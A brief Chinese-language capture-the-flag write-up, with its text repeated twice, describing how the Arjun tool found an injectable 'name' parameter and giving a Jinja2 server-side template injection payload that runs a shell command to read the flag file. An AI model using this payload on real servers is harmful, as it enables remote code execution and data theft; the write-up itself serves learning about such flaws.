WP
一道简单的SSTI,主要的难点还是找注入的参数。
学习了利用arjun这个HTTP参数发现工具:
Arjun
发现注入点是name参数。
然后简单的SSTI一下就可以了:
?name={{lipsum.__globals__.os.popen('cat flag.txt').read()}}
一道简单的SSTI,主要的难点还是找注入的参数。
学习了利用arjun这个HTTP参数发现工具:
Arjun
发现注入点是name参数。
然后简单的SSTI一下就可以了:
?name={{lipsum.__globals__.os.popen('cat flag.txt').read()}}